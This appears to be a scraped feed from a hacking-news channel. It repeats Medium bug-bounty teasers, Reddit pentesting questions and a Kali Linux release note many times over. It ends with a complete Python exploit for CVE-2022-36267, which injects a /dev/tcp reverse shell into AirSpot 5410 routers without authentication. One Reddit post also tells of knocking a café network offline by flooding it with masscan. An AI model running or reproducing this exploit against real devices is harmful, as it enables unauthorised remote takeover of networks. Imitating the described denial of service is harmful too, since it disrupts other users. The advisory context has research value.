How I earned a $6000 bug bounty from Cloudflare
Introduction:Continue reading on Medium »
Read more...
Introduction:Continue reading on Medium »
Read more...
Defensics Fuzz Testing VS Core Impact
https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/
Hi everyone.
I am quite new to PenTesting. Sorry if my question is stupid So my place got new hardware and stuff. And i got a mission to figure out the difference between these 2 penetration tests tools. Defensics Fuzz Testing and Core Impact So would you guys help me out understanding what the differences between those two are. And if i have one of them. Which will be better?? Or will i need to have both to cover everything??? Many thanks reddit community!!! submitted by /u/gameboybin (https://www.reddit.com/user/gameboybin)
[link] (https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/) [comments] (https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/
Hi everyone.
I am quite new to PenTesting. Sorry if my question is stupid So my place got new hardware and stuff. And i got a mission to figure out the difference between these 2 penetration tests tools. Defensics Fuzz Testing and Core Impact So would you guys help me out understanding what the differences between those two are. And if i have one of them. Which will be better?? Or will i need to have both to cover everything??? Many thanks reddit community!!! submitted by /u/gameboybin (https://www.reddit.com/user/gameboybin)
[link] (https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/) [comments] (https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Defensics Fuzz Testing VS Core Impact
Hi everyone. I am quite new to PenTesting. Sorry if my question is stupid So my place got new hardware and stuff. And i got a mission to...
My Experience on Hacking the Dutch Government
Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government…Continue reading on Medium »
Read more...
Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government…Continue reading on Medium »
Read more...
My Experience on Hacking the Dutch Government
https://gonzx.medium.com/my-experience-on-hacking-the-dutch-government-a2c5a5f43d83?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://gonzx.medium.com/my-experience-on-hacking-the-dutch-government-a2c5a5f43d83?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Experience on Hacking the Dutch Government
Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government…
Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government…Continue reading on Medium » (https://gonzx.medium.com/my-experience-on-hacking-the-dutch-government-a2c5a5f43d83?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Experience on Hacking the Dutch Government
Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government…
Panera Bread Public Network security is just sad.
https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/
I recently was at a Panera Bread, and their public network security was just horrible. Two of the main issues included: A: no good qos system, i was able to DoS the network by simply hogging the bandwith with masscan. no webpages or anything could load for other users while this command was running on my laptop B: Port 25 outbound is not blocked, which makes it extremely easy to scan the internet for open smtp relays to send spam mail from, this could be happening from a malicous actor in the building or a compromised computer on the network. So yeah the security sucks and it is very exploitable, especially for use to connect to unsecure smtp servers and send spam mail. submitted by /u/EvansMBgaming (https://www.reddit.com/user/EvansMBgaming)
[link] (https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/) [comments] (https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/
I recently was at a Panera Bread, and their public network security was just horrible. Two of the main issues included: A: no good qos system, i was able to DoS the network by simply hogging the bandwith with masscan. no webpages or anything could load for other users while this command was running on my laptop B: Port 25 outbound is not blocked, which makes it extremely easy to scan the internet for open smtp relays to send spam mail from, this could be happening from a malicous actor in the building or a compromised computer on the network. So yeah the security sucks and it is very exploitable, especially for use to connect to unsecure smtp servers and send spam mail. submitted by /u/EvansMBgaming (https://www.reddit.com/user/EvansMBgaming)
[link] (https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/) [comments] (https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Panera Bread Public Network security is just sad.
I recently was at a Panera Bread, and their public network security was just horrible. Two of the main issues included: A: no good qos system, i...
Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution
Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.The highlights for Kali’s 2022.3’s release:Discord Server - Kali’s new community real-time chat option has launched!Test Lab Environment - Quickly create a test bed to learn, practice, and benchmark tools and compare their resultsOpening Kali-Tools Repo - We have opened up the Kali tools repository & are accepting your submissions!Help Wanted - We are looking for a Go developer to help us on an open-source projectKali NetHunter Updates - New releases in our NetHunter storeVirtual Machines Updates - New VirtualBox image format, weekly images, and build-scripts to build your ownNew Tools In Kali - Would not be a release without some new tools!For more details, see the bug tracker changelog.More info here.Download Kali Linux 2022.3
Read more...
Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.The highlights for Kali’s 2022.3’s release:Discord Server - Kali’s new community real-time chat option has launched!Test Lab Environment - Quickly create a test bed to learn, practice, and benchmark tools and compare their resultsOpening Kali-Tools Repo - We have opened up the Kali tools repository & are accepting your submissions!Help Wanted - We are looking for a Go developer to help us on an open-source projectKali NetHunter Updates - New releases in our NetHunter storeVirtual Machines Updates - New VirtualBox image format, weekly images, and build-scripts to build your ownNew Tools In Kali - Would not be a release without some new tools!For more details, see the bug tracker changelog.More info here.Download Kali Linux 2022.3
Read more...
Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution
http://www.kitploit.com/2022/08/kali-linux-20223-penetration-testing.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/08/kali-linux-20223-penetration-testing.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution
Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.
The highlights for Kali’s 2022.3’s release:Discord Server (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-is-on-discord) - Kali’s new community real-time chat option has launched!Test Lab Environment (https://www.kali.org/blog/kali-linux-2022-3-release/#test-lab-environment) - Quickly create a test bed to learn, practice, and benchmark tools and compare their resultsOpening Kali-Tools Repo (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-tools-documentation) - We have opened up the Kali tools repository & are accepting your submissions!Help Wanted (https://www.kali.org/blog/kali-linux-2022-3-release/#help-wanted) - We are looking for a Go developer to help us on an open-source projectKali NetHunter Updates (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-nethunter-updates) - New releases in our NetHunter storeVirtual Machines Updates (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-for-virtual-machines) - New VirtualBox image format, weekly images, and build-scripts to build your ownNew Tools In Kali (https://www.kali.org/blog/kali-linux-2022-3-release/#new-tools-in-kali) - Would not be a release without some new tools!For more details, see the bug tracker changelog (https://bugs.kali.org/changelog_page.php).
More info here (https://www.kali.org/blog/kali-linux-2022-3-release/).
Download Kali Linux 2022.3 (https://www.kali.org/get-kali/)
___________________________
@hacking_Attack
@Hacking_Video
The highlights for Kali’s 2022.3’s release:Discord Server (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-is-on-discord) - Kali’s new community real-time chat option has launched!Test Lab Environment (https://www.kali.org/blog/kali-linux-2022-3-release/#test-lab-environment) - Quickly create a test bed to learn, practice, and benchmark tools and compare their resultsOpening Kali-Tools Repo (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-tools-documentation) - We have opened up the Kali tools repository & are accepting your submissions!Help Wanted (https://www.kali.org/blog/kali-linux-2022-3-release/#help-wanted) - We are looking for a Go developer to help us on an open-source projectKali NetHunter Updates (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-nethunter-updates) - New releases in our NetHunter storeVirtual Machines Updates (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-for-virtual-machines) - New VirtualBox image format, weekly images, and build-scripts to build your ownNew Tools In Kali (https://www.kali.org/blog/kali-linux-2022-3-release/#new-tools-in-kali) - Would not be a release without some new tools!For more details, see the bug tracker changelog (https://bugs.kali.org/changelog_page.php).
More info here (https://www.kali.org/blog/kali-linux-2022-3-release/).
Download Kali Linux 2022.3 (https://www.kali.org/get-kali/)
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux
Kali Linux 2022.3 Release (Discord & Test Lab)
In light of “Hacker Summer Camp 2022” (BlackHat USA, BSides LV, and DEFCON) occurring right now, we wanted to push out Kali Linux 2022.3 as a nice surprise for everyone to enjoy! With the publishing of this blog post, we have the download links ready for…
hacking: security in practice
socks5 proxies opsec
When you connect to a socks5 proxy what information can it log about your system when you connect to it?
submitted by /u/dannova23
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
socks5 proxies opsec
When you connect to a socks5 proxy what information can it log about your system when you connect to it?
submitted by /u/dannova23
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
socks5 proxies opsec
When you connect to a socks5 proxy what information can it log about your system when you connect to it?
hacking: security in practice
how do black hat wifi hackers make money?
Do they sell the packages they sniffed or what?
submitted by /u/Killbot001
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
how do black hat wifi hackers make money?
Do they sell the packages they sniffed or what?
submitted by /u/Killbot001
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
how do black hat wifi hackers make money?
Do they sell the packages they sniffed or what?
hacking: security in practice
FedTAFE is offering free self-paced CCNA right now. Offer expires on the 17th.
submitted by /u/PM_ME_PICS_OF_ROB0TS
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
FedTAFE is offering free self-paced CCNA right now. Offer expires on the 17th.
submitted by /u/PM_ME_PICS_OF_ROB0TS
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
FedTAFE is offering free self-paced CCNA right now. Offer expires...
Posted in r/hacking by u/PM_ME_PICS_OF_ROB0TS • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Conti extortion gangs behind surge of BazarCall phishing attacks
https://external-preview.redd.it/r0evZTTHiu3HFZer8V5dftb3GGOJL6x7sqvkc2d8b_M.jpg?width=640&crop=smart&auto=webp&s=646a255198653ef43c4d35c892bca44e46c41bfa submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Conti extortion gangs behind surge of BazarCall phishing attacks
https://external-preview.redd.it/r0evZTTHiu3HFZer8V5dftb3GGOJL6x7sqvkc2d8b_M.jpg?width=640&crop=smart&auto=webp&s=646a255198653ef43c4d35c892bca44e46c41bfa submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit: Conti extortion gangs behind surge of BazarCall phishing attacks
Explore this post and more from the hacking community
hacking: security in practice
Post was deleted not sure why..??? BIOS password on G8 Elitebook.
Hey,
I am wondering how or is it poss to remove a BIOS password from a 850 G8 HP Elitebook.
Do the AMD an Intel variants of these laptops have the same BIOS chip, Can I use the https://bios-pw.org/ web site for this or must I remove the chip and re-program ?
All help is greatly appreciated,
Cheers,
Jay
submitted by /u/jaymcs76
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Post was deleted not sure why..??? BIOS password on G8 Elitebook.
Hey,
I am wondering how or is it poss to remove a BIOS password from a 850 G8 HP Elitebook.
Do the AMD an Intel variants of these laptops have the same BIOS chip, Can I use the https://bios-pw.org/ web site for this or must I remove the chip and re-program ?
All help is greatly appreciated,
Cheers,
Jay
submitted by /u/jaymcs76
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Post was deleted not sure why..??? BIOS password on G8 Elitebook.
Hey, I am wondering how or is it poss to remove a BIOS password from a 850 G8 HP Elitebook. Do the AMD an Intel variants of these laptops have...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
AirSpot 5410 0.3.4.1-4 Remote Command Injection
https://4.bp.blogspot.com/-dXEgdVI0XVY/WWlvXX6BPpI/AAAAAAAAIOU/sj4iy4kTRsMzyN3cFQhci5D2DaW9DOMPwCLcBGAs/s1600/h52.png
AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
AirSpot 5410 0.3.4.1-4 Remote Command Injection
https://4.bp.blogspot.com/-dXEgdVI0XVY/WWlvXX6BPpI/AAAAAAAAIOU/sj4iy4kTRsMzyN3cFQhci5D2DaW9DOMPwCLcBGAs/s1600/h52.png
AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.
SHA-256 |
0453a46f41ec4c59c37a44bb644827c11fe0d7e8677419a16aefa00836c95383Download
# -*- coding: utf-8 -*-
# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267
from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()
def banner():
airspanLogo = """
,-.
/ \ `. __..-,O
: \ --''_..-'.'
| . .-' `. '.
: . .`.'
\ `. / ..
\ `. ' .
`, `. \
,|,`. `-.\
'.|| ``-...__..-`
| | Airspan
|__| AirSpot 5410
/||\ PWNED x_x
//||\\
// || \\
__//__||__\\__
'--------------'Necrum Security Labs
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(airspanLogo))
def pingWebInterface(RHOST, RPORT):
url = 'https://{}:{}'.format(RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
if response.status_code != 200:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
print('[INFO] Airspan device web interface seems reachable!')
except:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
try:
print('[INFO] Executing reverse shell...')
response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
return
except Exception as e:
print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
return False
def main():
banner()
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
AirSpot 5410 0.3.4.1-4 Remote Command Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.